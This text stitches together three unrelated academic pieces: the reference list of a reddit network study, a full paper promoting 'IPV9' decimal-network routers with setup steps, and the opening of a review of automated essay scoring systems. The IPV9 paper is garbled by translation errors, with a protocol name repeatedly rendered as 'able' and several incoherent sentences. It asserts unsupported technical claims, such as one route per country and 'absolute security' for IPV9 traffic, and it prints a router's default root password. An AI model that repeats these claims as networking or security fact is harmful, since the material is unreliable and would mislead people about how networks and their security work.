1999-66, Stanford InfoLab. 18. Bastian M, Heymann S, Jacomy M (2009) Gephi: An open source software for exploring and manipulating networks. In: Adar E, Hurst M, Finin T, Glance NS, Nicolov N, et al., editors, ICWSM. The AAAI Press. 19. reddit (2011). Saying goodbye to an old friend and revising the default subreddits. URL http: //blog.reddit.com/2011/10/saying-goodbye-to-old-friend-and.html. 20. Barabási AL, Albert R (1999) Emergence of scaling in random networks. Science 286: 509-512. 21. Humphries MD, Gurney K (2008) Network small-world-ness: A quantitative method for determin- ing canonical network equivalence. PLoS ONE 3: e0002051. 22. Hintze A, Adami C (2010) Modularity and anti-modularity in networks with arbitrary degree distribution. Biology Direct 5: 32+. 23. Kang JC (2013). The New York Times: Should reddit be blamed for the spreading of a smear? URL http://www.nytimes.com/2013/07/28/magazine/ should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all. 24. Ahn YY, Han S, Kwak H, Moon S, Jeong H (2007) Analysis of topological characteristics of huge online social networking services. In: Proceedings of the 16th International Conference on World Wide Web. New York, NY, USA: ACM, WWW ’07, pp. 835–844. doi:10.1145/1242572.1242685. 25. Mislove A, Marcon M, Gummadi KP, Druschel P, Bhattacharjee B (2007) Measurement and anal- ysis of online social networks. In: Proceedings of the 7th ACM SIGCOMM Conference on Internet Measurement. New York, NY, USA: ACM, IMC ’07, pp. 29–42. doi:10.1145/1298306.1298311. http://www.reddit.com/wiki/faq#wiki_what_is_reddit.3F http://www.reddit.com/wiki/faq#wiki_what_is_reddit.3F http://www.alexa.com/siteinfo/reddit.com http://rhiever.github.io/redditviz/clustered/ http://rhiever.github.io/redditviz/clustered/ http://dx.doi.org/10.6084/m9.figshare.874101 http://dx.doi.org/10.6084/m9.figshare.874101 http://blog.reddit.com/2011/10/saying-goodbye-to-old-friend-and.html http://blog.reddit.com/2011/10/saying-goodbye-to-old-friend-and.html http://www.nytimes.com/2013/07/28/magazine/should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all http://www.nytimes.com/2013/07/28/magazine/should-reddit-be-blamed-for-the-spreading-of-a-smear.html?pagewanted=all 10 26. Banerjee N, Chakraborty D, Dasgupta K, Mittal S, Joshi A, et al. (2009) User interests in social media sites: An exploration with micro-blogs. In: Proceedings of the 18th ACM Conference on Information and Knowledge Management. New York, NY, USA: ACM, CIKM ’09, pp. 1823–1826. doi:10.1145/1645953.1646240. 27. reddit (2013). About reddit. URL http://www.reddit.com/about. 28. Serrano M, Bogu M, Vespignani A (2009) Extracting the multiscale backbone of complex weighted networks. Proceedings of the National Academy of Sciences 106: 6483-6488. 29. Hagberg AA, Schult DA, Swart PJ (2008) Exploring network structure, dynamics, and function using NetworkX. In: Proceedings of the 7th Python in Science Conference (SciPy2008). Pasadena, CA USA, pp. 11–15. 30. Blondel VD, Guillaume JL, Lambiotte R, Lefebvre E (2008) Fast unfolding of communities in large networks. Journal of Statistical Mechanics: Theory and Experiment 2008: P10008. http://www.reddit.com/about 11 Supplementary Information Table S1. Descriptive statistics of the bipartite (user-to-subreddit) network Statistic Value Total # of users 876,961 Total # of subreddits 15,122 Average # of subreddits per user 9.69 Minimum # of subreddits per user 1 Maximum # of subreddits per user 112 Average # of users per subreddit 561.8 Minimum # of users per subreddit 1 Maximum # of users per subreddit 523,025 work_dje5ojarjrczblufj6vqhi46zi ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-012 10 Research and Implementation of Future Network Router Sun Huai 1. School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China 2. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control Xi'an, China E-mail: sh1227467868@163.com Wang Zhongsheng 1. School of Computer Science and Engineering Xi'an Technological University Xi'an, 710021, China 2. State and Provincial Joint Engineering Lab. of Advanced Network, Monitoring and Control Xi'an, China E-mail: wzhsh1681@163.com Abstract—This paper summarizes the process and characteristics of IPV9, and introduces the digital domain name system, route management and security. The tunneling and dual protocol stack technologies are described. Both the transition from IPv4 to IPV9 and from IPV9 to IPv4 will be based on mature network conversion services that support protocol compatibility. The IPV9 router is currently available in two models, 100-megabit and gigabit. Both routers have good ability to meet the network needs of IPV9. The film transmission system of Beijing University of Posts and Telecommunications uses IPV9 and 5G technology, which is a relatively advanced transmission application of IPV9 at present. It summarizes the convenience and security brought by the new network address, and provides a new idea for the development of the network. Keywords-Future Network; Router; Network Transformation I. THE NEW NETWORK IPV9 Internet Protocol (IP) is a communication protocol designed for computers to communicate with each other in the network. IP provides a common rule for computers to access the Internet. The Internet has become the largest open network in the world. With the rapid development of the global economy, the advancement of communication technology and network technology, the penetration rate of computers and mobile terminals is getting higher and higher. The problems with IPv4 are also exposed. For example, in the address space, performance, network security and routing bottlenecks, IPv4 makes it difficult to meet the needs of the Internet in the future. To solve the IPv4 many problems, IPv6, IPV9 and other Internet protocols have been born. A. The Production of IPV9 The new network covers three new technologies: address coding design, new addressing mechanism and new address architecture design[1]. It aims to build a core technology system based on the underlying IP network. On this basis, a new framework can be formed. Connected and compatible with a network system that covers existing networks (Internet with IPv4 and IPv6 technologies). 2011 US government agency has the authority of the professional and technical confirmation from the law, my country has IP framework with the United States Internet network to the prior art, proprietary technology core network sovereignty. This is the patented technology of IPV9 (Method of using whole digital code to assign address for computer). The official patent name is “the method of allocating addresses to computers using full digital coding”. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 11 The IPV9 protocol refers to the 0-9 Arabic digital network as the virtual IP address, and uses decimal as the text representation method, which is a convenient way to find online users[2]. In order to improve efficiency and facilitate end users, some of the addresses can be directly used for domain name. At the same time, it is also called “new generation security and reliable information integrated network protocol”. It uses the classification and coding of the original computer network, cable radio and television network and telecommunication network. B. The Characteristics of IPV9 By using IPV9 routers, clients, protocol conversion routers and other devices to build a pure IPV9 network, IPV9/IPv4 hybrid network to achieve a new generation of Internet systems with independent and secure intellectual property rights. Including the domestically controllable IPV9 future network root domain name system, promote technology convergence, service integration, data convergence, and achieve cross-level, cross-regional, cross-system, cross-department, cross-business collaborative management and services. With the data concentration and sharing as the way, we will build a national integrated national big data center, accelerate the promotion of domestically-controlled independent control alternative plans, and build a safe and controllable information technology system. In the existing TCP/IP protocol, conventional packet switching cannot support true real-time applications and circuit switching, and supports applications such as transmitting sound or images in circuits in a four-layer protocol. With the demand for voice, image and data triple play, the incompatibility of human-machine interface and the environmental protection requirements for redundant links, especially the original security mechanism is unreasonable, it is imperative to establish a new network theory foundation. So in 2001 , China established the Decimal Network Standard Working Group to study and implement security-based first-come-authentication communication rules, address encryption, as short as 16 bits up to 2048 bits of address space, resource reservation, virtual real circuit The communication network transmission mode, such as character direct addressing and three-layer four-layer hybrid network architecture. The existing TCP/IP protocol is a unreliable packet protocol with a maximum packet length of 1514 bytes. The TCP/IP/M protocol of IPV9, which is led by China, not only inherits the unreliable packet protocol of the existing TCP/IP protocol, but also develops absolute code stream and long stream code[3]. The data packet can reach tens of megabytes or more. After three can be transmitted directly by telephone and cable television data link is established without affecting the existing transmission network until four transmission new transmission theory until they have finished the removal of three of four transport protocol. 1) Digital Domain Name System In the digital domain name system, IPv4 and IPv6 are domain name resolutions through the United States, while IPV9 is set by countries, which avoids the limitation of IP addresses and reduces the use of domain names by the state[4]. IPV9 is a "decimal network" with independent intellectual property rights developed according to the invention patent "Method of Allocating Addresses for Computers Using All Digital Encoding". Its decimal network introduces a digital domain name system, which can be used to convert the original binary through a decimal network. The address is converted into decimal text, allowing the computers on the network to connect to each other, to communicate and transmit data to each other, and to be compatible with Chinese and English domain names. The digital domain name technology used by the IPV9 decimal network reduces the difficulty of network management, the vast address space and the newly added security mechanism, and solves many problems faced by the existing IPv4. The advantages of International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 12 other aspects can also meet the different levels of demand for various devices in the future. 2) Routing In terms of routing, the increase in the size of the Internet has caused the IPv4 routing table to swell, making the efficiency of network routing declining. The emergence of IPV9 solves this problem, and the optimization of routing improves the efficiency of the network. IPV9 establishes an IPV9 tunnel between the mobile unit and the proxy , and then relays the data packet sent to the mobile unit's home address received by the “proxy” used as the mobile unit to the current location of the mobile unit through the tunnel, thereby implementing Network terminal mobility support. IPv6 has a smaller routing table than IPv4. IPv6 addresses are assigned according to the clustering principle, which enables the router to represent a piece of network with one record in the table, reduces the length of routing table in the router, and improves the speed of forwarding packets from the routing table. The address allocation of IPV9 follows the principle of spatial clustering, which enables the IPV9 router to represent a national network and an application network with one record, greatly reducing the length of routing table in the router and improving the speed of forwarding packets by routing table. At the same time, this network can express a specific geographical location[5]. According to this logic, only one route is needed between countries. For example, the route to China is 86. The IPv4 routing table is large and irregular, and the IPv6 routing table is smaller than the IPv4 routing table, but the IPv6 routing table contains no geographic information and the routing is messy. 3) Security IPV9 encryption technology and authentication technology have significantly improved than IPv4, and the encryption technology proposed by IPV9 is difficult to decipher at the physical level, and the confidential performance has been significantly improved. However, at the level of network information security, there are still many factors that cause insecure network information in China. The fundamental reason is that the root servers of IPv4 and IPv6 are in the United States. Many patents related to the network are in the hands of the United States. At the same time, the risk of information exposure may also be introduced. The IPV9 is to have independent intellectual property rights of Internet Protocol, can bring a lot of protection to the information security of the country[6]. IPV9’s address space enables end-to-end secure transmission, making it possible for people to use devices to directly assign addresses. Both IPv4 and IPv6 do not have the concept of national geographic location. Most of their domain name resolution servers are in the United States, and IPV9 proposes the concept of “sovereign equality”, which enables each country to have its own root domain name system. II. INTRODUCTION TO NETWORK ACCESS TECHNOLOGY IPV9 has a huge IP address resource space, which not only completely solves the current situation of IPv4 address resource shortage, but also far superior to IPv4 network in terms of the number of IP addresses it can use. Due to the large scale of the current IPv4 protocol, no matter which protocol is in use, it is impossible to fully replace IPv4 in a short period of time. It must go through a cyclic and gradual replacement process. Therefore, the problem of transition mechanism should be considered. In order to successfully complete the process of IPV9 protocol replacing IPv4 protocol, the first consideration is to deal with the relationship between the existing IPv4 network and the future IPV9 network. The problem to be solved is how to achieve a smooth transition of IPV9 network, so that it can solve the problem of IP address shortage in a short time. In fact, the solution of the transition mechanism problem can promote the application of IPV9, which is of great International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 13 significance to whether it can become the next generation Internet protocol or just a LAN protocol. A. Tunnel Technology Tunneling technology is a technology that converts the data gram in IPV9 format into the data gram in IPv4 format and finally transmits it in the routing system of IPv4 network. A tunnel has a tunnel entrance and a tunnel exit[7]. There is only one tunnel entrance and one tunnel exit. First, at the tunnel entrance, the IPV9 data gram is transformed and processed, and the data information is parsed and encapsulated into a data gram in IPv4 format. The processed data gram is then transmitted along the virtual link identified by the tunnel marker. When the data gram arrives at the exit of the tunnel, it is handed over to the IPv4 protocol. According to the corresponding protocol, the data gram is processed, along with the field value, which is the value of the next header field of the article. After the processing, if the tunnel protocol value can still be detected, the IPv4 header will be discarded and the data gram will be unsealed to obtain the destination address in the original IPV9 message, and then the message will be sent to the original address according to the destination address. At the same time, the transmitted data gram is processed using the IPV9 protocol. During the transition from IPv4 to IPV9, tunneling enabled IPV9 node communication by using existing IPv4 networks. Figure 1 is a schematic diagram of IPV9 data gram encapsulation. IPv4 Data Header Unpack IPV9 Date Header IPV9 Date Header Package Payload Payload Figure 1. Schematic diagram of IPV9 data gram packaging B. Double Stack Technique Dual stack refers to the fact that a single node supports both IPv4 and IPV9 protocol stacks at the same time. Such a node can directly communicate with IPv4 nodes based on IPv4 protocol, or with IPV9 nodes based on IPV9 protocol. Therefore, it can serve as a connection point between IPv4 network and IPV9 network, and such a node is IPV9/IPv4 node mentioned earlier. Since the new IPV9 protocol stack is mainly aimed at the original IPv4 protocol stack network layer part of the major changes, for the transport layer and other layers above the basic changes, IPV9/IPv4 nodes are usually implemented using a double IP layer structure. This is shown in figure 2. Application Layer Protocol TCP/UDP Protocol Ipv4 Protocol IPV9 Protocol Network Interface Layer Protocol Figure 2. Double IP layer structure diagram For the router, however, because of the large changes have taken place in IP protocol, and IP routing protocol that is close to the corresponding changes have taken place goes, so "double stack" router is refers to in a router equipment maintenance able and IPv4 two routines by the protocol stack, so that half of the router can also can communicate with host able with IPv4 hosts, respectively support independent able and IPv4 routing protocol, IPv4 and able routing information routing protocols to calculate, according to their different routing table maintenance. The routing table obtained by IPV9 data gram is forwarded according to the routing protocol of IPV9, and the routing table obtained by IPv4 data gram is forwarded according to the routing protocol of IPv4. The router protocol structure that supports IPV9 and IPv4 dual protocol stacks is shown in figure 3. RIP BGP4 RIPNG BGP4+ TCP/UDP Protocol IPv4 Protocol IPV9 Protocol Physical Network Figure 3. Protocol structure of dual stack router International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 14 The network using the dual-stack technology does not have the problem of inter working, so it has certain convenience. However, it needs to assign an IPv4 address to each IPV9 node, which will lead to the problem of IPv4 address resource strain. In addition, every IPV9/IPv4 nodes to run at the same time IPv4 and able two kinds of protocol stack, at the same time save two sets of command set, at the same time calculation, maintenance and storage of two list items, for gateway device also need to two message transformation and encapsulation protocol stack, this undoubtedly and increase the load of each node, higher demands on the performance of these nodes. In addition, DNS servers must support the mapping of host domain names to IPV9 addresses on a dual-stack network. III. INTRODUCTION TO IPV9 ROUTING EQUIPMENT With the expansion of the new generation Internet routing system in China, the new generation Internet routing system has been deployed in Beijing, Shanghai, Chongqing, northeast China, Sichuan, Xinjiang, Shandong, Guangdong, Zhejiang, Hong Kong, Macao and other places. Manual configuration of address and route has not been able to meet the current development form, in the configuration, inefficient, complex and other defects have been gradually exposed. In order to cope with the huge routing node management and configuration, an efficient and automated configuration system is needed to handle the allocation and configuration management of the new generation of Internet addresses. A. 100-megabit Router The whole machine of the megabit router is shown in figure 4, including two signal antennas and the main body of the machine. Figure 4. Whole figure The panel on the gigabit router is shown in figure 5. The panel includes network connection indicator light, WIFI signal light, USB connection signal light and power signal light. Figure 5. Panel figure The warning light of the gigabit router is as follows. When the red light of the power indicator is on, the power supply is normal. When the blue light of WAN indicator flashes, WAN is normal. The blue light of the LAN indicator flashes when the LAN is normal. When the blue light of WIFI indicator flashes, WIFI is normal; USB is normal when the blue light of USB indicator flashes. The prompt light diagram is shown in table 1. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 15 The front panel is shown in figure 6. The front panel has USB interface and TF card slot. USB interface can be used to connect USB mouse, keyboard, USB disk and other devices. The TF card slot is used to insert the TF card. TABLE I. LIGHTS TABLE Indicator Light Description Features Power Supply Red light on : Normal WAN Blue light flashing : Normal LAN Blue light flashing : Normal WIFI Blue light flashing : Normal USB Blue light flashing : Normal Figure 6. Front panel figure The back panel is shown in the figure 7. The back panel has a DC port, which is used to connect the power supply to the router. Note that using a mismatched power supply can cause damage to the router. The RESET button is the restore button. Press to restart the device. Long press for about 5 seconds to restore the device to the factory default Settings. When the system status indicator changes from slow flicker to fast flicker, it means that the router has successfully resumed the factory setting. At this time, release the RESET button and the router will restart. The WAN port is the WAN port jack. This port is used to connect Ethernet cables. LAN4, LAN3, LAN2 and LAN1 ports are: LAN port jack. This port is used to connect to a hub, switch, or computer with a network card installed on the LAN. Figure 7. Back panel B. Gigabit Router The gigabit router's whole machine is shown in the figure 8, including six signal antennas and the main body of the machine. The six signal antennas include four 2.4g antennas and two 5G antennas. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 16 Figure 8. Whole figure The front panel is shown in the figure 9, and the back panel has a power port, which is used to connect the power supply to power the router. Note that using a mismatched power supply can cause damage to the router. The RESET button is the restore button. Press to restart the device. Long press for about 5 seconds to restore the device to the factory default Settings. When the system status indicator changes from slow flicker to fast flicker, it means that the router has successfully resumed the factory setting. At this time, release the RESET button and the router will restart. The WAN port is the WAN port jack. This port is used to connect Ethernet cables. LAN4, LAN3, LAN2 and LAN1 ports are: LAN port jack. This port is used to connect to a hub, switch, or computer with a network card installed on the LAN. USB interface can be used to connect USB mouse, keyboard, USB disk and other devices. The TF card slot is used to insert the TF card. IV. IPV9 ROUTING SETUP PROCEDURES AND METHODS A. Login Router Configuration Interface Enter 192.168.1.1 in the browser address bar as shown in the browser login interface below, and press enter to enter the system login interface as shown in figure 10. Enter the default user name root and the default password shsjzwlxxkjyxgs in the system login interface as shown in figure 11. Click the login button and you will see the overview interface as shown in figure 12. Figure 9. Front panel figure Figure 10. Browser login International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 17 Figure 11. System login interface Figure 12. IPV9 overview interface B. IPv9 User Registration Users who use the system for the first time should register before using the router function. User registration is shown in figure 13 .The user types are divided into individuals and enterprises. After the personal router registers the device, the address is automatically assigned without manual allocation. The enterprise router manually assigns the address, and one enterprise account can register multiple devices. Before International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 18 you register, you need to send the SMS verification code and enter the SMS verification code. 1) Click the menu IPv9 drop-down key to select the user registration function. 2) Enter the user name, password, confirmation password, registration type, real name, certificate type, certificate number, E-mail, mobile phone, enterprise name, address, postal code and remarks according to the text prompt of user registration. 3) Enter your phone number and click the send button on the right. 4) After the phone receives the verification code, fill in the verification code. 5) Click the user registration button below. Figure 13. IPV9 overview interface C. Equipment registration When the individual user registers the device, not only the device information is registered, but also the IPv4/IPv9 address is automatically assigned to the device, while the enterprise user only registers the device information. The device registration is shown in figure 14. 1) Click the menu IPv9 drop-down button to select the device registration function. 2) Choose your city. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 19 3) Click the device registration button below. D. Configuration of WIFI Click the network to select WIFI and enter the WIFI configuration interface. In figure 15, you can see the working state of WIFI. If you need to modify the configuration of WIFI, click modify. Modify the name of WIFI as shown in figure 16. Figure 14. IPV9 user device registration Figure 15. Configuration of WIFI International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 20 Figure 16. IPV9 user device registration Configure the device WIFI encryption method. Generally, it is recommended to use the encryption mode shown（WPA_PSK/WPA2-Psk Mixed Mode） above to enter the new password and click "save & apply" button. This is the normal router setup, after which a new router is configured. The encryption configuration is shown in figure 17. Figure 17. Encryption configuration International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 21 V. IPV9 AND 5G MOVIE TRANSMISSION SYSTEM Able movie network issuance application of Beijing Unicom 5G network and China mobile company in Suzhou 5G network has already passed the Beijing university of posts and telecommunications able fiber routing backbone nodes and able backbone fiber optic cable connected directly across the country, and on May 21, 2019, the first in the world at 500 MBPS end-to-end to 1000 MBPS speed, in local access able the national backbone network, successfully carried out the digital film distribution network (each film data capacity in hundreds of GB or so). The national online distribution of Chinese films was the first in the world to enter the new era of "one hour", and the intelligent cinema based on IPV9 address was realized. The IPV9/IPv4 router is a dual protocol stack router. By building this dual protocol stack router, the IPV9 network can be realized and the IPv4 network can be compatible with IPV9, thus achieving a good transition from IPv4 to IPV9. Through the configuration of different interfaces of routers, the conversion between different protocols can be realized to realize the data transmission of pure IPV9 protocol packet, IPV9 over IPv4 and IPv4 over IPV9, while IPV9 over IPv4 and IPV9 over IPV9 are realized by tunnel technology, which is an important way to realize the intercommunication between IPv4 and IPV9 networks. A. IPV9 Private Network Transmission Figure 18 shows the transmission of pure IPV9 private network. An IPV9 and IPV4 router is directly set up in the state administration of film and the cinema, which is connected through the IPV9 private network. The router interface is configured as the IPV9 transmission mode, so the line between the state administration of film and the cinema is the pure IPV9 protocol transmission. The network between the two is full of IPV9 protocol packets, which can guarantee absolute security. Figure 18. IPV9 private network transmission B. IPV9 Private Network Tunnel Transmission IPv4 over IPV9, IPV9/IPv4 router can be compatible with IPv4 network, namely IPv4 packets can be transmitted on the able private network, realize the IPv4 over able, to design a scheme of transmission as shown in figure 19. Both ends set up double protocol stack router, the router for private network between. The advantage is the backbone adopts able transmission protocol, security can get reliable guarantee. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 22 Figure 19. Private network tunnel transmission The transmission process of IPV9 based IPv4 packets is as follows: 1) Router I received IPv4 packets from the IPv4 network. 2) Router 1 encapsulates IPv4 packets in IPV9 message. The source address and destination address of IPv9 message correspond to the entrance address and exit address of the tunnel respectively, that is, the IPV9 address of router 1 and router 2. 3) The encapsulated IPV9 packets are transmitted along and through the marked tunnel link, routed to the IPV9 address, and arrive at the destination router 2 to complete the transmission of IPV9 private network line. 4) Router 2 receives the IPV9 packet from router 1, unseals the IPV9 packet to obtain the original IPv4 packet, and then sends it out. VI. CONCLUSION With the development of the Internet and the increasing number of Internet users, the shortage of IP address resources has become a bottleneck restricting its development. The application of IPV9 is spreading in China, especially in the government, Banks and other sectors. IPV9 has a large address capacity, is compatible with IPv4 and IPv6, and uses special encryption mechanisms to make the network environment more secure. This paper discusses the IPV9 address architecture and the digital domain name system, discusses the different network access technologies in detail, introduces the megabit and gigabit routers that support the use of new networks, and discusses the configuration methods of routers in detail. This paper analyzes the film transmission system of Beijing university of posts and telecommunications at the network level, which is very important for the future deployment of IPV9 network. REFERENCE [1] Xie Jianping etc. Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [2] Xie Jianping etc. A method of assigning addresses to network computers using the full decimal algorithm [P]. CN: ZL00135182.6, 2004.2.6. [3] V. Fuller, T. Li,Network Working Group. Classless Inter-Domain Routing (CIDR): an Address Assignment and Aggregation Strategy, RFC-1519, 1993.9. [4] Kohler E, Li J, Paxson V, et al. Observed Structure of Addresses in IP Traffic [J]. IEEE/ACM Transactions on Networking, 2006, 14(6):1207-1218. [5] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [6] Xie Jianping etc. Digital domain name specification, SJ/T11271-2002, 2002.07. [7] M. Crawford. Network Working Group.Transmission of IPv6 Packets over Ethernet Networks.RFC-2464, 1998.12. work_dkcqjp34xrbfzhxg3lxfqxjc3m ---- Submitted 7 May 2019 Accepted 30 June 2019 Published 12 August 2019 Corresponding author Mohamed Abdellatif Hussein, teeefa@nceee.edu.eg, teeefa@gmail.com Academic editor Diego Amancio Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.208 Copyright 2019 Hussein et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Automated language essay scoring systems: a literature review Mohamed Abdellatif Hussein1, Hesham Hassan2 and Mohammad Nassef2 1 Information and Operations, National Center for Examination and Educational Evaluation, Cairo, Egypt 2 Faculty of Computers and Information, Computer Science Department, Cairo University, Cairo, Egypt ABSTRACT Background. Writing composition is a significant factor for measuring test-takers’ ability in any language exam. However, the assessment (scoring) of these writing compositions or essays is a very challenging process in terms of reliability and time. The need for objective and quick scores has raised the need for a computer system that can automatically grade essay questions targeting specific prompts. Automated Essay Scoring (AES) systems are used to overcome the challenges of scoring writing tasks by using Natural Language Processing (NLP) and machine learning techniques. The purpose of this paper is to review the literature for the AES systems used for grading the essay questions. Methodology. We have reviewed the existing literature using Google Scholar, EBSCO and ERIC to search for the terms ‘‘AES’’, ‘‘Automated Essay Scoring’’, ‘‘Automated Essay Grading’’, or ‘‘Automatic Essay’’ for essays written in English language. Two categories have been identified: handcrafted features and automatically featured AES systems. The systems of the former category are closely bonded to the quality of the designed features. On the other hand, the systems of the latter category are based on the automatic learning of the features and relations between an essay and its score without any handcrafted features. We reviewed the systems of the two categories in terms of system primary focus, technique(s) used in the system, the need for training data, instructional application (feedback system), and the correlation between e-scores and human scores. The paper includes three main sections. First, we present a structured literature review of the available Handcrafted Features AES systems. Second, we present a structured literature review of the available Automatic Featuring AES systems. Finally, we draw a set of discussions and conclusions. Results. AES models have been found to utilize a broad range of manually-tuned shallow and deep linguistic features. AES systems have many strengths in reducing labor-intensive marking activities, ensuring a consistent application of scoring criteria, and ensuring the objectivity of scoring. Although many techniques have been imple- mented to improve the AES systems, three primary challenges have been identified. The challenges are lacking of the sense of the rater as a person, the potential that the systems can be deceived into giving a lower or higher score to an essay than it deserves, and the limited ability to assess the creativity of the ideas and propositions and evaluate their practicality. Many techniques have only been used to address the first two challenges. Subjects Artificial Intelligence, Computer Education Keywords AES, Automated essay scoring, Essay grading, Handcrafted features, Automatic features extraction How to cite this article Hussein MA, Hassan H, Nassef M. 2019. Automated language essay scoring systems: a literature review. PeerJ Comput. Sci. 5:e208 http://doi.org/10.7717/peerj-cs.208 mailto:teeefa@nceee.edu.eg mailto:teeefa@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.208 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.208 INTRODUCTION Test items (questions) are usually classified into two types: selected-response (SR), and constructed-response (CR). The SR items, such as true/false, matching or multiple-choice, are much easier than the CR items in terms of objective scoring (Isaacs et al., 2013). SR questions are commonly used for gathering information about knowledge, facts, higher-order thinking, and problem-solving skills. However, considerable skill is required to develop test items that measure analysis, evaluation, and other higher cognitive skills (Stecher et al., 1997). CR items, sometimes called open-ended, include two sub-types: restricted-response and extended-response items (Nitko & Brookhart, 2007). Extended-response items, such as essays, problem-based examinations, and scenarios, are like restricted-response items, except that they extend the demands made on test-takers to include more complex situations, more difficult reasoning, and higher levels of understanding which are based on real-life situations requiring test-takers to apply their knowledge and skills to new settings or situations (Isaacs et al., 2013). In language tests, test-takers are usually required to write an essay about a given topic. Human-raters score these essays based on specific scoring rubrics or schemes. It occurs that the score of an essay scored by different human-raters vary substantially because human scoring is subjective (Peng, Ke & Xu, 2012). As the process of human scoring takes much time, effort, and are not always as objective as required, there is a need for an automated essay scoring system that reduces cost, time and determines an accurate and reliable score. Automated Essay Scoring (AES) systems usually utilize Natural Language Processing and machine learning techniques to automatically rate essays written for a target prompt (Dikli, 2006). Many AES systems have been developed over the past decades. They focus on automatically analyzing the quality of the composition and assigning a score to the text. Typically, AES models exploit a wide range of manually-tuned shallow and deep linguistic features (Farag, Yannakoudakis & Briscoe, 2018). Recent advances in the deep learning approach have shown that applying neural network approaches to AES systems has accomplished state-of-the-art results (Page, 2003; Valenti, Neri & Cucchiarelli, 2017) with the additional benefit of using features that are automatically learnt from the data. Survey methodology The purpose of this paper is to review the AES systems literature pertaining to scoring extended-response items in language writing exams. Using Google Scholar, EBSCO and ERIC, we searched the terms ‘‘AES’’, ‘‘Automated Essay Scoring’’, ‘‘Automated Essay Grading’’, or ‘‘Automatic Essay’’ for essays written in English language. AES systems which score objective or restricted-response items are excluded from the current research. The most common models found for AES systems are based on Natural Language Processing (NLP), Bayesian text classification, Latent Semantic Analysis (LSA), or Neural Networks. We have categorized the reviewed AES systems into two main categories. The former is based on handcrafted discrete features bounded to specific domains. The latter Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.208 is based on automatic feature extraction. For instance, Artificial Neural Network (ANN)- based approaches are capable of automatically inducing dense syntactic and semantic features from a text. The literature of the two categories has been structurally reviewed and evaluated based on certain factors including: system primary focus, technique(s) used in the system, the need for training data, instructional application (feedback system), and the correlation between e-scores and human scores. Handcrafted features AES systems Project Essay GraderTM (PEG) Ellis Page developed the PEG in 1966. PEG is considered the earliest AES system that has been built in this field. It utilizes correlation coefficients to predict the intrinsic quality of the text. It uses the terms ‘‘trins’’ and ‘‘proxes’’ to assign a score. Whereas ‘‘trins’’ refers to intrinsic variables like diction, fluency, punctuation, and grammar,‘‘proxes’’ refers to correlations between intrinsic variables such as average length of words in a text, and/or text length. (Dikli, 2006; Valenti, Neri & Cucchiarelli, 2017). The PEG uses a simple scoring methodology that consists of two stages. The former is the training stage and the latter is the scoring stage. PEG should be trained on a sample of essays from 100 to 400 essays, the output of the training stage is a set of coefficients (β weights) for the proxy variables from the regression equation. In the scoring stage, proxes are identified for each essay, and are inserted into the prediction equation. To end, a score is determined by estimating coefficients (β weights) from the training stage (Dikli, 2006). Some issues have been marked as a criticism for the PEG such as disregarding the semantic side of essays, focusing on surface structures, and not working effectively in case of receiving student responses directly (which might ignore writing errors). PEG has a modified version released in 1990, which focuses on grammar checking with a correlation between human assessors and the system (r =0.87) (Dikli, 2006; Page, 1994; Refaat, Ewees & Eisa, 2012). Measurement Inc. acquired the rights of PEG in 2002 and continued to develop it. The modified PEG analyzes the training essays and calculates more than 500 features that reflect intrinsic characteristics of writing, such as fluency, diction, grammar, and construction. Once the features have been calculated, the PEG uses them to build statistical and linguistic models for the accurate prediction of essay scores (Home—Measurement Incorporated, 2019). Intelligent Essay AssessorTM (IEA) IEA was developed by Landauer (2003). IEA uses a statistical combination of several measures to produce an overall score. It relies on using Latent Semantic Analysis (LSA); a machine-learning model of human understanding of the text that depends on the training and calibration methods of the model and the ways it is used tutorially (Dikli, 2006; Foltz, Gilliam & Kendall, 2003; Refaat, Ewees & Eisa, 2012). IEA can handle students’ innovative answers by using a mix of scored essays and the domain content text in the training stage. It also spots plagiarism and provides feedback (Dikli, 2006; Landauer, 2003). It uses a procedure for assigning scores in a process that Hussein et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.208 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.208 Figure 1 The IEA architecture. Full-size DOI: 10.7717/peerjcs.208/fig-1 begins with comparing essays to each other in a set. LSA examines the extremely similar essays. Irrespective of the replacement of paraphrasing, synonym, or reorganization of sentences, the two essays will be similar LSA. Plagiarism is an essential feature to overcome academic dishonesty, which is difficult to be detected by human-raters, especially in the case of grading a large number of essays (Dikli, 2006; Landauer, 2003). (Fig. 1) represents IEA architecture (Landauer, 2003). IEA requires smaller numbers of pre-scored essays for training. On the contrary of other AES systems, IEA requires only 100 pre-scored training essays per each prompt vs. 300–500 on other systems (Dikli, 2006). Landauer (2003) used IEA to score more than 800 students’ answers in middle school. The results showed a 0.90 correlation value between IEA and the human-raters. He explained the high correlation value due to several reasons including that human-raters could not compare each essay to each other for the 800 students while IEA can do 